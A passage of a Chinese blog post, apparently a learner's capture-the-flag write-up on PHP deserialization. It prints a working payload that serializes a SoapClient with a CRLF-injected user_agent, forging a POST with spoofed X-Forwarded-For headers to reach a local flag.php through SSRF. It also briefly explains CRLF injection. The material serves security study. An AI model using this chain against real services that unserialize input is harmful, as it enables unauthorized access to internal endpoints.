WSDL用来描述如何访问具体的接口</span><br><span class="line">  UUDI用来管理、分发、查询webServer</span><br><span class="line">  SOAP是连接web服务和客户端的接口</span><br><span class="line">  简单地说，SOAP 是一种简单的基于 XML 的协议，它使应用程序通过 HTTP 来交换信息</span><br><span class="line">  原文链接：https:&#x2F;&#x2F;blog.csdn.net&#x2F;LYJ20010728&#x2F;article&#x2F;details&#x2F;117112864</span><br><span class="line"></span><br><span class="line">- &#96;&#96;&#96;</span><br><span class="line">  用法：</span><br><span class="line">  </span><br><span class="line">  public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )</span><br><span class="line">  </span><br><span class="line">  第一个参数是用来指明是否是wsdl模式</span><br><span class="line">  如果为null，那就是非wsdl模式，反序列化的时候会对第二个参数指明的url进行soap请求</span><br><span class="line">  </span><br><span class="line">  如果第一个参数为null，则第二个参数必须设置location和uri</span><br><span class="line">    其中location是将请求发送到的SOAP服务器的URL</span><br><span class="line">    uri是SOAP服务的目标名称空间</span><br><span class="line">  </span><br><span class="line">  第二个参数允许设置user_agent选项来设置请求的user-agent头</span><br><span class="line">  正常情况下的SoapClient类，调用一个不存在的函数，会去调用__call方法，发出请求</span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line">  SoapClient发出的请求包的user_agent是完全可控的，结合CRLF注入可以构造一个完全可控的POST请求，因为POST请求最关键的Content-Length和Content-Type都在user_agent之下</span><br><span class="line">  如果是GET请求，就简单得多，只需要构造好location就可以了</span><br><span class="line">  需要注意的是，SoapClient只会发出请求，而不会收到响应</span><br></pre></td></tr></table></figure>
#### demo：259
</code></pre>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//flag.php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$xff</span> = explode(<span class="string">&#x27;,&#x27;</span>, <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>]);</span><br><span class="line">array_pop(<span class="variable">$xff</span>);</span><br><span class="line"><span class="variable">$ip</span> = array_pop(<span class="variable">$xff</span>);   <span class="comment">//对请求头中的X-Forwarded-For进行两次pop</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$ip</span>!==<span class="string">&#x27;127.0.0.1&#x27;</span>)&#123;</span><br><span class="line">	<span class="keyword">die</span>(<span class="string">&#x27;error&#x27;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	<span class="variable">$token</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;token&#x27;</span>];yike</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$token</span>==<span class="string">&#x27;ctfshow&#x27;</span>)&#123;    <span class="comment">//POST传入token，其值为ctfshow</span></span><br><span class="line">		file_put_contents(<span class="string">&#x27;flag.txt&#x27;</span>,<span class="variable">$flag</span>);  <span class="comment">//满足上面条件即可访问含有flag的flag.txt文件</span></span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$vip</span> = unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;vip&#x27;</span>]);</span><br><span class="line"><span class="comment">//vip can get flag one key</span></span><br><span class="line"><span class="variable">$vip</span>-&gt;getFlag();</span><br></pre></td></tr></table></figure>
<p>解题：</p>
<p>利用ssrf访问flag.php接着构造post数据 toke=ctfshow和请求头X-Forwarded-For 就能把flag写到flag.txt中了。<br>那么ssrf漏洞在哪呢，这就得用到我们前面提到的SoapClient类了。这个类中有个__call魔术方法（当调用不存在的方法时触发），会调用SoapClient类的构造方法。<br>另外用到CRLF（注意读序列化内容要读源码）<br>payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$ua</span> = <span class="string">&quot;ctfshow\r\nX-Forwarded-For:127.0.0.1,127.0.0.1,127.0.0.1\r\nContent-Type:application/x-www-from-urlencoded\r\nContent-length:13\r\n\r\ntoken=ctfshow&quot;</span>;  <span class="comment">//监听发现ua内容可控，构造XFF两次pop  POST内容</span></span><br><span class="line"><span class="variable">$client</span> = <span class="keyword">new</span> SoapClient(<span class="literal">null</span>,<span class="keyword">array</span>(<span class="string">&#x27;uri&#x27;</span>=&gt;<span class="string">&#x27;http://127.0.0.1/&#x27;</span>,<span class="string">&#x27;location&#x27;</span>=&gt;<span class="string">&#x27;http://127.0.0.1/flag.php&#x27;</span>,<span class="string">&#x27;user_agent&#x27;</span>=&gt;<span class="variable">$ua</span>));   <span class="comment">//通过ssrf访问flag.php</span></span><br><span class="line"><span class="comment">//$client-&gt;getflag();</span></span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize(<span class="variable">$client</span>)); <span class="comment">//满足条件，将条件内容序列化，再由题目代码反序列化，调用未知函数，调用__call方法发出请求</span></span><br></pre></td></tr></table></figure>
<p>get传vip=xxx(序列化内容)，最后访问/flag.txt拿到flag了。</p>
<p>感悟：似懂非懂</p>
<h2 id><a href="#" class="headerlink" title></a></h2><h2 id="其他小知识"><a href="#其他小知识" class="headerlink" title="其他小知识"></a>其他小知识</h2><p>cookie传参：是以;作为分隔符的，否则会导致解析错误（解决方法：url编码）</p>
<h3 id="CRLF-Injection"><a href="#CRLF-Injection" class="headerlink" title="CRLF Injection"></a>CRLF Injection</h3><p>CRLF是”回车 + 换行”（\r\n）的简称。在HTTP协议中，HTTP Header与HTTP Body是用两个CRLF分隔的，浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以，一旦我们能够控制HTTP 消息头中的字符，注入一些恶意的换行，这样我们就能注入一些会话Cookie或者HTML代码，所以CRLF Injection又叫HTTP Response Splitting，简称HRS。</p>
<p>附链接：<a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/CRLF%20Injection%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90.html">https://wooyun.js.org/drops/CRLF%20Injection%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90.html</a></p>
<h2 id="题外"><a href="#题外" class="headerlink" title="题外"></a>题外</h2><p>先到这里，其他知识以后再补充</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/LYJ20010728/article/details/117112864">https://blog.csdn.net/LYJ20010728/article/details/117112864</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/solitudi/article/details/113588692">https://blog.csdn.net/solitudi/article/details/113588692</a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/19/Namp/" rel="prev" title="Namp">
      <i class="fa fa-chevron-left"></i> Namp
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/03/24/%E5%8F%98%E9%87%8F%E8%A6%86%E7%9B%96/" rel="next" title="变量覆盖">
      变量覆盖 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AE%80%E4%BB%8B"><span class="nav-number">2.</span> <span class="nav-text">反序列化简介</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="nav-number">2.1.</span> <span class="nav-text">魔术方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E9%83%A8%E5%88%86%E6%AD%A3%E5%88%99"><span class="nav-number">3.</span> <span class="nav-text">绕过部分正则</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%80%83%E9%80%B8"><span class="nav-number">4.</span> <span class="nav-text">反序列化逃逸</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E5%A2%9E%E5%A4%9A"><span class="nav-number">4.1.</span> <span class="nav-text">字符增多</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#demo-262"><span class="nav-number">4.1.1.</span> <span class="nav-text">demo:262</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SoapClient"><span class="nav-number">5.</span> <span class="nav-text">SoapClient</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SoapClient-call%E6%96%B9%E6%B3%95%E8%BF%9B%E8%A1%8CSSRF"><span class="nav-number">5.1.</span> <span class="nav-text">SoapClient __call方法进行SSRF</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link"><span class="nav-number">6.</span> <span class="nav-text"></span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E5%B0%8F%E7%9F%A5%E8%AF%86"><span class="nav-number">7.</span> <span class="nav-text">其他小知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#CRLF-Injection"><span class="nav-number">7.1.</span> <span class="nav-text">CRLF Injection</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E5%A4%96"><span class="nav-number">8.</span> <span class="nav-text">题外</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">六公子买单</p>
  <div class="site-description" itemprop="description">一头努力的菜鸟</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">29</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">六公子买单</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
